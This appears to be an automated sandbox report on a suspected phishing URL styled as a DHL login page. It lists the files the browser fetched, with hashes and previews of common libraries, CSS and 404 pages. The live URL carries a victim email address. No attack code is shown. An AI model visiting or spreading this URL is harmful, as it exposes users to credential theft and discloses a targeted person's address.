                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, e19263.dsca.akamaiedge.net, dns.msftncsi.com, www.dhl.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, www.dhl.com.edgekey.net, update.googleapis.com, clients.l.google.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com
                                                                  No simulations
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  No context
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):61
                                                                  Entropy (8bit):3.990210155325004
                                                                  Encrypted:false
                                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_checked.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (19015)
                                                                  Category:downloaded
                                                                  Size (bytes):19188
                                                                  Entropy (8bit):5.212814407014048
                                                                  Encrypted:false
                                                                  SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                  MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                  SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                  SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                  SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                  Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (32065)
                                                                  Category:downloaded
                                                                  Size (bytes):85578
                                                                  Entropy (8bit):5.366055229017455
                                                                  Encrypted:false
                                                                  SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                  MD5:2F6B11A7E914718E0290410E85366FE9
                                                                  SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                  SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                  SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                  Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):2639
                                                                  Entropy (8bit):5.144335573859073
                                                                  Encrypted:false
                                                                  SSDEEP:48:F1XIpfd4AV/IPzeLpBH5tOjyZh5tM+M5tGvu5t7q5t7bb5td45tsM5tOx85tQ5t1:F14Nd4AVFLpBZayNq+KkvkBo9lqbI6Mn
                                                                  MD5:C8E06E018F7F281440FFD10A7982C639
                                                                  SHA1:50EFB47D506F8EE51F2E3A7895BAF018319C6682
                                                                  SHA-256:85043CE8E7D8EBF1F939CA300FADFAC06BB38EE7A0F99E92B5AAD618BD298ACE
                                                                  SHA-512:C5E15EEB4DB9678FF5D9EAC6DB1AD21FB47B008462B74BCAC97744E8A13247B32C8695256A3C67A83261DFD09DC90C9AB01F192385C0B36A314EA58241D6517F
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/login.css
                                                                  Preview:/* Code tidied up by ScrapBook */..lightGreen { background-color: rgb(208, 237, 6); }..meDarkGreen { background-color: rgb(124, 169, 3); }..meLightGray { background-color: rgb(238, 238, 238); }..tabsTable { border-collapse: collapse; padding: 0px; }..tabsTable td { padding: 0px; border: 0px none; }..shadowVerticalCommon { width: 2px; height: 24px; background: transparent url("meLogin_shadowVertical.png") no-repeat scroll 0px 0px; }..shadowTable { height: 100%; width: 8px; }..meInputText { background-color: rgb(255, 255, 255); height: 1.2em; font-size: 12px; width: 163px; padding: 3px; border: 1px solid rgb(204, 204, 204); }..ax4tabcommong { width: 80px; height: 23px; text-align: center; cursor: pointer; -moz-user-select: none; }..ax4tab { color: rgb(68, 68, 68); }..ax4metab { color: white; }..meTabBox { height: 23px; width: 80px; padding: 1px 1px 0px; }..greenFrame { margin: 0px 3px 3px; min-height: 329px; }..divUnderLoginTabs { margin: 3px 3px 0px; height: 5px; }..loginFormCommon { he
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):734
                                                                  Entropy (8bit):4.807183685250212
                                                                  Encrypted:false
                                                                  SSDEEP:12:UDGo6CeVE48zn4iXKlRAm9CECDRflcAaMh5sMfL54h5bDQnY529ZcEpMwAFtAYP1:XodznV+AmgcMh5j0DR529Z5DAFtv/4pe
                                                                  MD5:8B11D4A20EDC004F06C6D8394680D8E8
                                                                  SHA1:1D936A63044D0D941E0B6D160526420FCE605237
                                                                  SHA-256:98305F94F3E71BD805C285229D26F3C05FA0590622375EB96A62CAADB4EE05DC
                                                                  SHA-512:AEA30C2B4D6EC1FD038B8830F773C2C6D707616701F67D7EC92A1835892B8EB842122716C4B9B719A26F499EFC6A7744E1D803F731DE3F4EC470956772B1E6DC
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/axit-jquery.datepicker.css
                                                                  Preview:/* Code tidied up by ScrapBook */..ui-datepicker .ui-datepicker-header { position: relative; padding: 0.2em 0px; white-space: nowrap; }..ui-datepicker-prev .ui-icon, .ui-datepicker-next .ui-icon { text-indent: -1e+7px; }..ui-datepicker .ui-datepicker-prev span, .ui-datepicker .ui-datepicker-next span { display: block; position: absolute; left: 50%; margin-left: -8px; top: 50%; margin-top: -8px; }..ui-datepicker-trigger { margin-left: 1px; cursor: pointer; display: inline; vertical-align: middle; margin-top: -2px; background-image: url("calendar.png"); height: 15px; width: 16px; border: medium none; }..ui-datepicker-today { border: 1px solid; }..hasDatepicker { display: inline; }..ui-datepicker-other-month { opacity: 0.35; }.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (19015)
                                                                  Category:dropped
                                                                  Size (bytes):19188
                                                                  Entropy (8bit):5.212814407014048
                                                                  Encrypted:false
                                                                  SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                  MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                  SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                  SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                  SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_all.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_emptyall_focused.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=19, height=5771, bps=242, compression=LZW, PhotometricIntepretation=RGB, description=(c) Christoph Papsch - www.christoph-papsch.com | Jegliche Verwendung nur mit Urhebervermerk nach Parag. 13 UrhG. Die IPTC-Date, manufacturer=Canon, model=Canon EOS 5DS R, orientation=upper-left, width=8656], baseline, precision 8, 4252x2835, components 3
                                                                  Category:downloaded
                                                                  Size (bytes):4253111
                                                                  Entropy (8bit):7.974939960094946
                                                                  Encrypted:false
                                                                  SSDEEP:98304:yzXn4x/407lAOLeO6w+HTVtmCywjrZiE2j9Kujc:y7n4N40hfSpjTrZfluY
                                                                  MD5:D66F0D4CE49F047C84F03D9D081AE89B
                                                                  SHA1:E0B64B9BB8832074CAE3463BE6EB2AF7124DDD91
                                                                  SHA-256:2091E0A8671F854EA0889EA395ACD26B99938F7D202CBCD0D9E4AC16FA9ACCBF
                                                                  SHA-512:0920811E46DC403382A15216BBE2849D6D98166161CFC6F6695FB08372EA3B901D6E4069542ABA0280BF074F1BEC75D3DCB983275C1AF3D8F714F2544A55BBCC
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/bg.jpg
                                                                  Preview:......Exif..II*................!..................................................................................................................................................(...........1...&.......2.......*...;.......>...........O...i.......h.............(c) Christoph Papsch - www.christoph-papsch.com | Jegliche Verwendung nur mit Urhebervermerk nach Parag. 13 UrhG. Die IPTC-Daten und Urheberangaben sind nach Parag. 95c UrhG rechtlich geschuetzt und duerfen nicht entfernt werden..Canon.Canon EOS 5DS R...-..'....-..'..Adobe Photoshop CC 2015.5 (Macintosh).2017:11:23 17:22:19.Christoph Papsch.www.christoph-papsch.com.!........................."...........'.......d...0...........2.......d...........0230................................2...........:...........B...........J...................................R...........75..........75..........75..............................................Z...........b...............................................................1.......j...2.......w.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (333)
                                                                  Category:downloaded
                                                                  Size (bytes):143174
                                                                  Entropy (8bit):5.200173359208125
                                                                  Encrypted:false
                                                                  SSDEEP:1536:OmtvbSyP7rzVnmT79LnUCF4ESEMpB6/tklyYYI9HTjh353eo0XoYbSj+wL4cl:YLn/ojJxe7SF
                                                                  MD5:E3F557135498764C28F5012AA426938E
                                                                  SHA1:66C4202B46EE5667DBE82B9608E13BBC5CA0F358
                                                                  SHA-256:0058C550274149B7D2CDE2DA8072744BB850BFCC9E58A29276DDC2A9E612515E
                                                                  SHA-512:7263CF3B1AC0D55ABCD375B0859DFBB46361B157FF4D887BE9DA481F2D0AFF75ADE84077E8D3386D8E5FD1AB73A4150086C1B30BB4AA4832FE1B3A4F9362228E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Preview:/* Code tidied up by ScrapBook */..backgroundImage { background: transparent url("bg.png") repeat-x scroll 0px 0px; }.TD.HEADADDR_MIGRATION { font-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 10px 5px; text-align: left; border-right: 1px solid rgb(255, 255, 255); }.TD.HEADADDR_MIGRATION_NOWRAP { font-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 5px; text-align: left; border-right: 1px solid rgb(255, 255, 255); white-space: nowrap; }.TD.CHEADADDR_MIGRATION { font-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 5px; text-align: center; border-right: 1px solid rgb(255, 255, 255); }.TD.CHEADADDR_BTN { text-align: center; border-right: 1px solid rgb(255, 255, 255); }.TD.RHEADADDR_MIGRATION { font-size: 10px; font-family: Verdana,Helvetica,Lucida,Arial,sans-serif; padding: 5px; text-align: right; border-right: 1px solid rgb(255, 255, 255); }.TD.HEADADDR_TOPLEVEL_MIGRATION { color: rgb(0, 0, 0); font-
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                  Category:downloaded
                                                                  Size (bytes):61
                                                                  Entropy (8bit):3.990210155325004
                                                                  Encrypted:false
                                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (48664)
                                                                  Category:dropped
                                                                  Size (bytes):48944
                                                                  Entropy (8bit):5.272507874206726
                                                                  Encrypted:false
                                                                  SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                  MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                  SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                  SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                  SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_checked.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):1518
                                                                  Entropy (8bit):4.88297863862348
                                                                  Encrypted:false
                                                                  SSDEEP:12:UDGoJMoWbxPEZ2BHMZt1RWMZ8BYWMZbgJK7YLFQBZQ3ab9yc8gWpc7PDZ2rygFT8:XoJ+bJ0m8tDQ6bIF+byP7RLvM9
                                                                  MD5:C30D0A9B9D3244605CF586F0A6DAD860
                                                                  SHA1:84BAC6A510F1D89268115A5D3FE079749C10A57D
                                                                  SHA-256:56EDB9A9EF3AC8BDE3FBB2B3AED17258B39AA27BEE4745166FF9B083BB751659
                                                                  SHA-512:32F45FCE9245E1D90AB54DBD116F962574A7683248DA8F998EA6C6AB6D66A3CDFDAE068EBBEC56A16CCC47C9C3A937220D5C4F76932737276C9A9A62C973DAB8
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/axit-jquery.autocomplete.css
                                                                  Preview:/* Code tidied up by ScrapBook */..ui-autocomplete { padding: 0px; border: 1px solid black; max-height: 200px; overflow-y: auto; overflow-x: hidden; }..ui-menu-item-odd { background-color: rgb(238, 238, 238); }.li > .ui-corner-all, .ui-corner-top, .ui-corner-left, .ui-corner-tl { border-top-left-radius: 0px; }.li > .ui-corner-all, .ui-corner-top, .ui-corner-right, .ui-corner-tr { border-top-right-radius: 0px; }.li > .ui-corner-all, .ui-corner-bottom, .ui-corner-left, .ui-corner-bl { border-bottom-left-radius: 0px; }.li > .ui-corner-all, .ui-corner-bottom, .ui-corner-right, .ui-corner-br { border-bottom-right-radius: 0px; }..ui-autocomplete-input { background: transparent url("IconSearch.svg") no-repeat scroll right 3px center / 16px 16px; padding-right: 22px; }..ui-autocomplete-loading { background: rgb(245, 245, 245) url("loading_icon.gif") no-repeat scroll right 3px center ! important; }..ui-autocomplete-over { background-color: rgb(10, 36, 106); color: white; }..ui-autocomplete.ui-m
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (50758)
                                                                  Category:downloaded
                                                                  Size (bytes):51039
                                                                  Entropy (8bit):5.247253437401007
                                                                  Encrypted:false
                                                                  SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                  MD5:67176C242E1BDC20603C878DEE836DF3
                                                                  SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                  SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                  SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                  Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_checked_focused.png
                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text
                                                                  Category:downloaded
                                                                  Size (bytes):315
                                                                  Entropy (8bit):5.0572271090563765
                                                                  Encrypted:false
                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
